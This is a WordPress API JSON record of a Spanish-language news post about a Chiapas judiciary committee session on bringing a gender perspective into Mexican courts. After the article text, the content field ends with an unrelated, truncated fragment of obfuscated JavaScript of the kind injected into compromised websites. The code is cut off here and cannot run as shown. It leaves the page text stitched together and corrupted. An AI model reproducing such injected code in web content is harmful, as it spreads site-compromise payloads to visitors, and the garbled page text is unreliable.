{"id":1329,"date":"2022-04-13T23:44:16","date_gmt":"2022-04-13T23:44:16","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=1329"},"modified":"2022-04-13T23:44:17","modified_gmt":"2022-04-13T23:44:17","slug":"la-imparticion-de-justicia-con-perspectiva-de-genero-una-realidad-en-el-poder-judicial","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=1329","title":{"rendered":"La impartici\u00f3n de justicia con perspectiva de g\u00e9nero, una realidad en el Poder Judicial"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"682\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/04\/IMG-20220413-WA0030-1-1024x682.jpg\" alt=\"\" class=\"wp-image-1330\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/04\/IMG-20220413-WA0030-1-1024x682.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/04\/IMG-20220413-WA0030-1-300x200.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/04\/IMG-20220413-WA0030-1-768x512.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/04\/IMG-20220413-WA0030-1-310x205.jpg 310w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/04\/IMG-20220413-WA0030-1.jpg 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p><br>-Poder Judicial del Estado sede de la D\u00e9cimo Quinta Sesi\u00f3n Ordinaria del Comit\u00e9 Estatal de Seguimiento y Evaluaci\u00f3n del Convenio de Adhesi\u00f3n al Pacto para Introducir la Perspectiva de G\u00e9nero de los \u00d3rganos de Impartici\u00f3n de Justicia en M\u00e9xico.<br>Tuxtla Guti\u00e9rrez, Chiapas. &#8211; El Poder Judicial en Chiapas, que encabeza el magistrado presidente Juan \u00d3scar Trinidad Palacios, ha dado seguimiento al Pacto para Introducir la Perspectiva de G\u00e9nero de los \u00d3rganos de Impartici\u00f3n de Justicia en M\u00e9xico, con el objetivo de implementar en nuestra entidad las disposiciones que se encuentran contenidas en \u00e9l, desde el a\u00f1o 2012, cuando se lleva a cabo su adhesi\u00f3n.En un esfuerzo de colaboraci\u00f3n institucional, se cuenta con la representaci\u00f3n de \u00f3rganos de impartici\u00f3n de justicia a nivel estatal y federal, quienes forman parte del Comit\u00e9 de Monitoreo para la evaluaci\u00f3n y seguimiento, as\u00ed como, para supervisar el cumplimiento del Pacto; adem\u00e1s, de trabajar para la consolidaci\u00f3n de la aplicaci\u00f3n de la perspectiva de g\u00e9nero en las Instituciones, generando ambientes libres de violencia y discriminaci\u00f3n por raz\u00f3n de sexo o g\u00e9nero.En ese tenor, se llev\u00f3 a cabo la D\u00e9cimo Quinta Sesi\u00f3n Ordinaria del Comit\u00e9 Estatal de Seguimiento y Evaluaci\u00f3n del Convenio de Adhesi\u00f3n al Pacto para Introducir la Perspectiva de G\u00e9nero de los \u00d3rganos de Impartici\u00f3n de Justicia en M\u00e9xico.En este marco, las consejeras de la Judicatura Mar\u00eda Itzel Ballinas Barbosa e Isela de Jes\u00fas Mart\u00ednez Flores, a nombre del magistrado presidente del Poder Judicial del Estado de Chiapas, Juan \u00d3scar Trinidad Palacios agradecieron la presencia y compromiso institucional de cada integrante del Comit\u00e9, convocando a que los acuerdos asumidos en estos trabajos, se cumplan con eficiencia y eficacia.Dijeron que estos trabajos de colaboraci\u00f3n evidencian el compromiso de las intuiciones para dar continuidad a los acuerdos que garantizan el sano desarrollo administrativa como jurisdiccional en beneficio de las y los chiapanecos.Adicionalmente el magistrado presidente del Tribunal Electoral del Estado, Gilberto Guzm\u00e1n B\u00e1tiz Garc\u00eda, como integrante del Comit\u00e9, dirigi\u00f3 un mensaje de corresponsabilidad donde dijo s\u00f3lo mediante el trabajo conjunto se pueden sacar adelante los intereses comunes de los chiapanecos.En esta Sesi\u00f3n, la directora de Igualdad de G\u00e9nero y Derechos Humanos, Mar\u00eda Silinia Aguilar Avenda\u00f1o, en su car\u00e1cter de secretaria t\u00e9cnica del Comit\u00e9, dio lectura al orden del d\u00eda y pase de lista. Tambi\u00e9n en su intervenci\u00f3n, resalt\u00f3 atribuciones que corresponden al cumplimiento de los lineamientos del Pacto: difundir, vincular y fungir como enlaces de los \u00f3rganos impartidores de Justicia que integran este apartado en el estado de Chiapas.Posteriormente, dieron arranque los trabajos que en los pr\u00f3ximos meses se aplicar\u00e1n y pondr\u00e1n en consideraci\u00f3n el Plan de Trabajo 2022.En uso de la palabra, magistrado presidente del Tribunal Federal de Justicia Administrativa, Alberto Rodr\u00edguez Garc\u00eda, destac\u00f3 la importancia del esfuerzo y voluntad de las instituciones que se suman a capacitarse e informarse de los protocolos y lineamientos para dirigirse con perspectiva de g\u00e9nero, y reafirm\u00f3 su compromiso y solidaridad para seguir realizando trabajos para mejorar el sistema de justicia, priorizando el respeto a los Derechos Humanos.Asistieron a la Sesi\u00f3n la magistrada presidenta del Tribunal Administrativo, Susana Sarmiento L\u00f3pez; en representaci\u00f3n del presidente de la Junta De Conciliaci\u00f3n y Arbitraje, Carlos Enrique Mart\u00ednez V\u00e1zquez, Guadalupe Magdalena Gallardo Oca\u00f1a; y como enlace del Tribunal Administrativo, la magistrada de la Ponencia B, M\u00f3nica de Jes\u00fas Trejo Vel\u00e1zquez.<\/p>\n\n\n\n<p>Direcci\u00f3n de Comunicaci\u00f3n Social&nbsp;y Relaciones P\u00fablicas61 7 87 00 Ext. 8020\/8021&nbsp;f&nbsp;: \/poderjudicial.chiapas&nbsp;t&nbsp;: @PJE_Chiapas<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>-Poder Judicial del Estado sede de la D\u00e9cimo Quinta Sesi\u00f3n Ordinaria del Comit\u00e9 Estatal de Seguimiento y Evaluaci\u00f3n del Convenio de Adhesi\u00f3n al Pacto para Introducir la Perspectiva de G\u00e9nero de los \u00d3rganos de Impartici\u00f3n de Justicia en M\u00e9xico.Tuxtla Guti\u00e9rrez, Chiapas. &#8211; El Poder Judicial en Chiapas, que encabeza el magistrado presidente Juan \u00d3scar Trinidad &hellip;<\/p>\n","protected":false},"author":2,"featured_media":1330,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-1329","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/1329","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1329"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/1329\/revisions"}],"predecessor-version":[{"id":1331,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/1329\/revisions\/1331"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/1330"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1329"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1329"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1329"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}